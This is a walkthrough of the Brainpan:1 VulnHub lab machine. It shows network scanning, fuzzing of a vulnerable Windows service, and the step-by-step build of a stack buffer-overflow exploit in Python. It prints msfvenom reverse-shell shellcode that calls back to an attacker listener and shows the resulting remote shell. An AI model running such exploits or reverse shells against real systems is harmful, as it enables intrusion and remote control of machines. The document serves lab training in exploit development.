VulnHub machine walkthrough [brainpan-1]

Name

Name: Brainpan:1
Release date: 20 March 2013

Download

  • Download (Mirror): https://download.vulnhub.com/brainpan/Brainpan.zip
  • Download (Torrent): https://download.vulnhub.com/brainpan/Brainpan.zip.torrent

Description

 _               _                         
| |__ _ __ __ _(_)_ __ _ __ __ _ _ __
| '_ \| '__/ _` | | '_ \| '_ \ / _` | '_ \
| |_) | | | (_| | | | | | |_) | (_| | | | |
|_.__/|_| \__,_|_|_| |_| .__/ \__,_|_| |_|
|_|
by superkojiman
http://www.techorganic.com

Disclaimer

By using this virtual machine, you agree that in no event will I be liable for any loss or damage, including without limitation indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of, or in connection with, the use of this software.
TL;DR: if something bad happens, it's not my fault.

Setup

Brainpan has been tested and found to work on the following hypervisors:
- VMware Player 5.0.1
- VMWare Fusion 5.0
- VirtualBox 4.2.8
Import Brainpan into your preferred hypervisor and configure the network settings to your needs. It will get an IP address via DHCP, but it is recommended that you run it within a NAT or visible to the host OS only, since it is vulnerable to attacks.

Source: Brainpan.zip/readme.txt

MD5 (brainpan.ova) = fc0f163220b9884df5dcc9cdc45361e4

Source: Brainpan.zip/md5.txt
VulnHub exclusive!

Information gathering

A quick nmap scan

root@kali:~# nmap -sn -v 192.168.56.0/24
Nmap scan report for 192.168.56.115
Host is up (0.00042s latency).
MAC Address: 08:00:27:DE:BA:CA (Oracle VirtualBox virtual NIC)

root@kali:~# nmap -p- -v -Pn -sV 192.168.56.115
PORT STATE SERVICE VERSION
9999/tcp open abyss?
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)

Browse to port 10000 to see what is being served:

Run a directory scan against it:

There is a binary in the bin directory.

Download the exe and load it into a debugger (OllyDbg or Immunity Debugger).

Before debugging, take a first look at brainpan.exe:

root@kali:~/vulnhub/brainpan1# file brainpan.exe 
brainpan.exe: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
root@kali:~/vulnhub/brainpan1# strings brainpan.exe
!This program cannot be run in DOS mode.
.text
`.data
.rdata
@.bss
.idata
[^_]
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
[^_]
[get_reply] s = [%s]
[get_reply] copied %d bytes to buffer
shitstorm
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|
[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD
>>
ACCESS DENIED
ACCESS GRANTED
[+] initializing winsock...
[!] winsock init failed: %d
done.
[!] could not create socket: %d
[+] server socket created.
[!] bind failed: %d
[+] bind done on port %d
[+] waiting for connections.
[+] received connection.
[+] check is %d
[!] accept failed: %d
[+] cleaning up.
-LIBGCCW32-EH-3-SJLJ-GTHR-MINGW32
w32_sharedptr->size == sizeof(W32_EH_SHARED)
../../gcc-3.4.5/gcc/config/i386/w32-shared-ptr.c
GetAtomNameA (atom, s, sizeof(s)) != 0
AddAtomA
ExitProcess
FindAtomA
GetAtomNameA
SetUnhandledExceptionFilter
__getmainargs
__p__environ
__p__fmode
__set_app_type
_assert
_cexit
_iob
_onexit
_setmode
abort
atexit
free
malloc
memset
printf
signal
strcmp
strcpy
strlen
(remaining output omitted ...)

A few of these matter:

  • brainpan.exe looks like the same program that is listening on port 9999
  • shitstorm looks like a password
  • strcpy is a likely buffer-overflow vector

Obviously, the first thing to try is the candidate password shitstorm.

root@kali:~# nc 192.168.56.115 9999
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|

[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD

>> shitstorm
ACCESS GRANTED

ACCESS GRANTED comes back.
Hmm... now, how to look at that strcpy call.
There are Evan's Debugger for Linux and Immunity Debugger (run through wine), but for "windozy" work like this I prefer to run Immunity Debugger in a Windows environment.

Note: anyone who already knows how to do a simple strcpy buffer overflow can skip ahead to the next section, because this part is deliberately long and "user-friendly". Plenty of fuzzing code and detail is included for each step so that anyone new to this attack vector can follow along and, hopefully, understand the process.

Time for a quick fuzzer to see whether some input causes a crash. This is a piece of code I reuse often, modifying it as I go with the shellcode and register values. Simple and effective.

etfuzz.py

# Python 2 script (print statement syntax); run with: python etfuzz.py
import sys,socket

victim = '192.168.56.115'
port = 9999

# 1000 bytes of 'A' (\x41): enough to overrun a small stack buffer
junk = "\x41" * 1000

payload = junk

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    print "[-] Connecting to " + str(victim)
    s.connect((victim, port))
    s.recv(1024)          # read the ENTER THE PASSWORD banner first

    # Send payload
    print "[-] Sending payload.... ",
    s.send(payload)
    print "Done"
    s.close()

except:
    print "[-] Unable to connect to " + str(victim)
    sys.exit(0)

Now run brainpan.exe and attach Immunity Debugger to the process. With the process listening on the Windows machine, throw 1000 fuzzing bytes (\x41) at port 9999 and see whether it crashes.

C:\Users\HASEE\Desktop\brainpan1>python etfuzz.py
[-] Connecting to 192.168.43.98
[-] Sending payload.... Done
C:\Users\HASEE\Desktop\brainpan1>brainpan.exe
[+] initializing winsock...done.
[+] server socket created.
[+] bind done on port 9999
[+] waiting for connections.
[+] received connection.
[get_reply] s = [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(_]
[get_reply] copied 1003 bytes to buffer

BAM! That produced the crash we were after: as the debugger shows, EIP has been overwritten with the fuzz bytes (41414141). Time to take control and have some fun.
Next question: how many bytes are needed to fill the buffer up to EIP? Metasploit's pattern tools answer that. Start by creating a pattern.

root@kali:~/vulnhub/brainpan1# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B

Add it to the fuzzing script etfuzz.py, replacing the junk A's with the pattern output.

# Python 2 script (print statement syntax); run with: python etfuzz.py
import sys,socket

victim = '192.168.43.98'
port = 9999

# 1000-byte cyclic pattern from pattern_create.rb -l 1000; every 4-byte window is unique
junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"

payload = junk

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    print "[-] Connecting to " + str(victim)
    s.connect((victim, port))
    s.recv(1024)          # read the banner first

    # Send payload
    print "[-] Sending payload.... ",
    s.send(payload)
    print "Done"
    s.close()

except:
    print "[-] Unable to connect to " + str(victim)
    sys.exit(0)

Next: restart brainpan.exe, re-attach the debugger and send the pattern to the listener.

C:\Users\HASEE\Desktop\brainpan1>python etfuzz.py
[-] Connecting to 192.168.43.98
[-] Sending payload.... Done
C:\Users\HASEE\Desktop\brainpan1>brainpan.exe
[+] initializing winsock...done.
[+] server socket created.
[+] bind done on port 9999
[+] waiting for connections.
[+] received connection.
[get_reply] s = [Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B(_]
[get_reply] copied 1003 bytes to buffer

EIP was overwritten again. Note the instruction pointer value, 35724134, and feed it to Metasploit's pattern_offset tool, which tells us how many bytes must be sent before the four that land in EIP.

root@kali:~/vulnhub/brainpan1# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 35724134
[*] Exact match at offset 524

So exactly 524 bytes of junk are needed to reach EIP. Edit the fuzzer accordingly and check whether EIP can be overwritten with four B's (\x42). Restart, re-attach and launch the fuzzer.
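To make the offset step reproducible without Metasploit installed, here is a small Python 3 reimplementation of what pattern_create.rb and pattern_offset.rb do. This is an added example, not code from the original walkthrough; it assumes nothing beyond the crash value 35724134 quoted above, and shows why that value maps to offset 524: the debugger displays EIP as a 32-bit number, but the stack bytes that produced it were read little-endian, so the value has to be packed back into bytes ("4Ar5") before searching the pattern.

```python
import string
import struct

UPPER, LOWER, DIGIT = string.ascii_uppercase, string.ascii_lowercase, string.digits
# 26 * 26 * 10 three-byte groups = 20280 bytes before the sequence would repeat
MAX_LEN = len(UPPER) * len(LOWER) * len(DIGIT) * 3


def pattern_create(length):
    """Reproduce pattern_create.rb: Aa0Aa1Aa2 ... Zz9, truncated to `length` bytes.

    Every (upper, lower, digit) group occurs exactly once, so any 4-byte window
    taken from the pattern is unique and maps back to a single offset.
    """
    if length > MAX_LEN:
        raise ValueError("pattern would repeat past %d bytes" % MAX_LEN)
    groups = (u + l + d for u in UPPER for l in LOWER for d in DIGIT)
    out, total = [], 0
    for group in groups:
        out.append(group)
        total += 3
        if total >= length:
            break
    return "".join(out)[:length]


def pattern_offset(pattern, eip_value):
    """Reproduce pattern_offset.rb -q <hex>: where in the pattern did EIP come from?

    EIP is shown as a number (e.g. 0x35724134) but was loaded from four stack
    bytes in little-endian order, so pack it back to bytes before searching.
    Returns -1 if the value is not part of the pattern (e.g. 0x41414141).
    """
    needle = struct.pack("<I", eip_value).decode("latin-1")
    return pattern.find(needle)


if __name__ == "__main__":
    pat = pattern_create(1000)
    print(pat)
    # The crash in the walkthrough reported EIP = 35724134
    print("[*] Exact match at offset %d" % pattern_offset(pat, 0x35724134))
```

The pattern is only unique within 20280 bytes; for a larger buffer the Metasploit tool wraps around and the offset becomes ambiguous, which is why `pattern_create` refuses longer lengths here.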

Voilà! EIP now reads 42424242, four bytes of B. What next? See whether our own code can be placed where ESP points. If so, we look for a jmp esp instruction (an instruction inside the binary, not a function call) and put its address in EIP, so that execution continues at ESP and runs the code stored there. Edit the fuzzer so that a run of C's (\x43) lands at ESP, and check that there is enough room for a potential shellcode: if all 500 C's arrive intact, a short NOP sled plus a shellcode of a few hundred bytes will fit.

# Python 2 script (print statement syntax); run with: python etfuzz.py
import sys,socket

victim = '192.168.43.98'
port = 9999

junk = "\x41" * 524         # 524 bytes reach the saved return address
eip = "\x42" * 4            # should show up as EIP = 42424242
shellcode = "\x43" * 500    # filler that should land where ESP points

payload = junk + eip + shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    print "[-] Connecting to " + str(victim)
    s.connect((victim, port))
    s.recv(1024)          # read the banner first

    # Send payload
    print "[-] Sending payload.... ",
    s.send(payload)
    print "Done"
    s.close()

except:
    print "[-] Unable to connect to " + str(victim)
    sys.exit(0)

As seen above, ESP has been filled with a long run of C's, so there is a usable region for shellcode. Now to find the address of a jmp esp. In Immunity Debugger, press ctrl-f and search for jmp esp. The first hit is at 311712F3. Note that this address contains no null byte, which matters because strcpy stops copying at the first \x00; that is also why \x00 is excluded from the shellcode below.

Next, generate some shellcode to test whether the proof of concept (PoC) works. Since the PoC box is a Windows machine, msfvenom is used to generate a simple Windows reverse shell.

root@kali:~# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.102 LPORT=443 R -e x86/shikata_ga_nai -b '\x00' -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1712 bytes
buf = b""
buf += b"\xba\x3a\x75\x8a\xdd\xd9\xed\xd9\x74\x24\xf4\x5b\x31"
buf += b"\xc9\xb1\x52\x31\x53\x12\x03\x53\x12\x83\xd1\x89\x68"
buf += b"\x28\xd9\x9a\xef\xd3\x21\x5b\x90\x5a\xc4\x6a\x90\x39"
buf += b"\x8d\xdd\x20\x49\xc3\xd1\xcb\x1f\xf7\x62\xb9\xb7\xf8"
buf += b"\xc3\x74\xee\x37\xd3\x25\xd2\x56\x57\x34\x07\xb8\x66"
buf += b"\xf7\x5a\xb9\xaf\xea\x97\xeb\x78\x60\x05\x1b\x0c\x3c"
buf += b"\x96\x90\x5e\xd0\x9e\x45\x16\xd3\x8f\xd8\x2c\x8a\x0f"
buf += b"\xdb\xe1\xa6\x19\xc3\xe6\x83\xd0\x78\xdc\x78\xe3\xa8"
buf += b"\x2c\x80\x48\x95\x80\x73\x90\xd2\x27\x6c\xe7\x2a\x54"
buf += b"\x11\xf0\xe9\x26\xcd\x75\xe9\x81\x86\x2e\xd5\x30\x4a"
buf += b"\xa8\x9e\x3f\x27\xbe\xf8\x23\xb6\x13\x73\x5f\x33\x92"
buf += b"\x53\xe9\x07\xb1\x77\xb1\xdc\xd8\x2e\x1f\xb2\xe5\x30"
buf += b"\xc0\x6b\x40\x3b\xed\x78\xf9\x66\x7a\x4c\x30\x98\x7a"
buf += b"\xda\x43\xeb\x48\x45\xf8\x63\xe1\x0e\x26\x74\x06\x25"
buf += b"\x9e\xea\xf9\xc6\xdf\x23\x3e\x92\x8f\x5b\x97\x9b\x5b"
buf += b"\x9b\x18\x4e\xcb\xcb\xb6\x21\xac\xbb\x76\x92\x44\xd1"
buf += b"\x78\xcd\x75\xda\x52\x66\x1f\x21\x35\x49\x48\x11\xa3"
buf += b"\x21\x8b\x61\x2a\x09\x02\x87\x46\x7d\x43\x10\xff\xe4"
buf += b"\xce\xea\x9e\xe9\xc4\x97\xa1\x62\xeb\x68\x6f\x83\x86"
buf += b"\x7a\x18\x63\xdd\x20\x8f\x7c\xcb\x4c\x53\xee\x90\x8c"
buf += b"\x1a\x13\x0f\xdb\x4b\xe5\x46\x89\x61\x5c\xf1\xaf\x7b"
buf += b"\x38\x3a\x6b\xa0\xf9\xc5\x72\x25\x45\xe2\x64\xf3\x46"
buf += b"\xae\xd0\xab\x10\x78\x8e\x0d\xcb\xca\x78\xc4\xa0\x84"
buf += b"\xec\x91\x8a\x16\x6a\x9e\xc6\xe0\x92\x2f\xbf\xb4\xad"
buf += b"\x80\x57\x31\xd6\xfc\xc7\xbe\x0d\x45\xf7\xf4\x0f\xec"
buf += b"\x90\x50\xda\xac\xfc\x62\x31\xf2\xf8\xe0\xb3\x8b\xfe"
buf += b"\xf9\xb6\x8e\xbb\xbd\x2b\xe3\xd4\x2b\x4b\x50\xd4\x79"

Now put it all together. The payload looks like this: {junk} {jmp esp address} {nops + buf}. The address is written little-endian, so 311712F3 becomes \xf3\x12\x17\x31.

# Python 2 script (print statement syntax); run with: python etfuzz.py
import sys,socket

victim = '192.168.43.98'
port = 9999

junk = "\x41" * 524            # 524 bytes reach the saved return address
eip = "\xf3\x12\x17\x31"       # 0x311712F3 (jmp esp) in little-endian byte order
buf = b"\x90" * 13             # short NOP sled in front of the shellcode
# msfvenom windows/shell_reverse_tcp, shikata_ga_nai encoded, no \x00 bytes
buf += b"\xba\x3a\x75\x8a\xdd\xd9\xed\xd9\x74\x24\xf4\x5b\x31"
buf += b"\xc9\xb1\x52\x31\x53\x12\x03\x53\x12\x83\xd1\x89\x68"
buf += b"\x28\xd9\x9a\xef\xd3\x21\x5b\x90\x5a\xc4\x6a\x90\x39"
buf += b"\x8d\xdd\x20\x49\xc3\xd1\xcb\x1f\xf7\x62\xb9\xb7\xf8"
buf += b"\xc3\x74\xee\x37\xd3\x25\xd2\x56\x57\x34\x07\xb8\x66"
buf += b"\xf7\x5a\xb9\xaf\xea\x97\xeb\x78\x60\x05\x1b\x0c\x3c"
buf += b"\x96\x90\x5e\xd0\x9e\x45\x16\xd3\x8f\xd8\x2c\x8a\x0f"
buf += b"\xdb\xe1\xa6\x19\xc3\xe6\x83\xd0\x78\xdc\x78\xe3\xa8"
buf += b"\x2c\x80\x48\x95\x80\x73\x90\xd2\x27\x6c\xe7\x2a\x54"
buf += b"\x11\xf0\xe9\x26\xcd\x75\xe9\x81\x86\x2e\xd5\x30\x4a"
buf += b"\xa8\x9e\x3f\x27\xbe\xf8\x23\xb6\x13\x73\x5f\x33\x92"
buf += b"\x53\xe9\x07\xb1\x77\xb1\xdc\xd8\x2e\x1f\xb2\xe5\x30"
buf += b"\xc0\x6b\x40\x3b\xed\x78\xf9\x66\x7a\x4c\x30\x98\x7a"
buf += b"\xda\x43\xeb\x48\x45\xf8\x63\xe1\x0e\x26\x74\x06\x25"
buf += b"\x9e\xea\xf9\xc6\xdf\x23\x3e\x92\x8f\x5b\x97\x9b\x5b"
buf += b"\x9b\x18\x4e\xcb\xcb\xb6\x21\xac\xbb\x76\x92\x44\xd1"
buf += b"\x78\xcd\x75\xda\x52\x66\x1f\x21\x35\x49\x48\x11\xa3"
buf += b"\x21\x8b\x61\x2a\x09\x02\x87\x46\x7d\x43\x10\xff\xe4"
buf += b"\xce\xea\x9e\xe9\xc4\x97\xa1\x62\xeb\x68\x6f\x83\x86"
buf += b"\x7a\x18\x63\xdd\x20\x8f\x7c\xcb\x4c\x53\xee\x90\x8c"
buf += b"\x1a\x13\x0f\xdb\x4b\xe5\x46\x89\x61\x5c\xf1\xaf\x7b"
buf += b"\x38\x3a\x6b\xa0\xf9\xc5\x72\x25\x45\xe2\x64\xf3\x46"
buf += b"\xae\xd0\xab\x10\x78\x8e\x0d\xcb\xca\x78\xc4\xa0\x84"
buf += b"\xec\x91\x8a\x16\x6a\x9e\xc6\xe0\x92\x2f\xbf\xb4\xad"
buf += b"\x80\x57\x31\xd6\xfc\xc7\xbe\x0d\x45\xf7\xf4\x0f\xec"
buf += b"\x90\x50\xda\xac\xfc\x62\x31\xf2\xf8\xe0\xb3\x8b\xfe"
buf += b"\xf9\xb6\x8e\xbb\xbd\x2b\xe3\xd4\x2b\x4b\x50\xd4\x79"

payload = junk + eip + buf

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    print "[-] Connecting to " + str(victim)
    s.connect((victim, port))
    s.recv(1024)          # read the banner first

    # Send payload
    print "[-] Sending payload.... ",
    s.send(payload)
    print "Done"
    s.close()

except:
    print "[-] Unable to connect to " + str(victim)
    sys.exit(0)

Start brainpan.exe, set up a netcat listener on port 443 and test the PoC.

C:\Users\HASEE\Desktop\brainpan1>python etfuzz.py
[-] Connecting to 192.168.43.98
[-] Sending payload.... Done
root@kali:~# nc -lvp 443
listening on [any] 443 ...
192.168.56.1: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.1] 18602
Microsoft Windows [Version 10.0.18363.592]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\HASEE\Desktop\brainpan1>chcp 65001
chcp 65001
Active code page: 65001

C:\Users\HASEE\Desktop\brainpan1>whoami
whoami
iz94tylsq69z\hasee

C:\Users\HASEE\Desktop\brainpan1>dir
dir
Volume in drive C has no label.
Volume Serial Number is 7A49-F084

Directory of C:\Users\HASEE\Desktop\brainpan1

2020/02/01 01:21 <DIR> .
2020/02/01 01:21 <DIR> ..
2020/01/31 20:48 21,190 brainpan.exe
2020/02/01 01:21 2,166 etfuzz.py
2 File(s) 23,356 bytes
2 Dir(s) 151,135,014,912 bytes free

C:\Users\HASEE\Desktop\brainpan1>net user
net user

User accounts for \\IZ94TYLSQ69Z

-------------------------------------------------------------------------------
Administrator ASPNET DefaultAccount
Guest HASEE WDAGUtilityAccount
  • Note: this shell is on the Windows test box. If its output is garbled (the banner above was printed by a Chinese-locale console), run chcp 65001 to switch the console to UTF-8.

Getting a shell

Good stuff... we now have a reverse TCP connection from our Windows test machine. The real target, however, is the Linux VM (brainpan.exe runs there under Wine, which is why a Windows binary is listening on a Linux host), so a Linux reverse shell is needed.

root@kali:~# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.56.102 LPORT=443 R -e x86/alpha_upper -b '\x00' -f python
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_upper
x86/alpha_upper succeeded with size 205 (iteration=0)
x86/alpha_upper chosen with final size 205
Payload size: 205 bytes
Final size of python file: 1007 bytes
buf = b""
buf += b"\x89\xe5\xd9\xcb\xd9\x75\xf4\x58\x50\x59\x49\x49\x49"
buf += b"\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33"
buf += b"\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41"
buf += b"\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41"
buf += b"\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a"
buf += b"\x4a\x49\x30\x31\x49\x4b\x5a\x57\x4b\x53\x31\x43\x47"
buf += b"\x33\x46\x33\x53\x5a\x53\x32\x4b\x39\x4b\x51\x38\x30"
buf += b"\x52\x46\x58\x4d\x4d\x50\x4a\x33\x36\x39\x48\x30\x37"
buf += b"\x4f\x58\x4d\x4d\x50\x30\x49\x44\x39\x5a\x59\x35\x38"
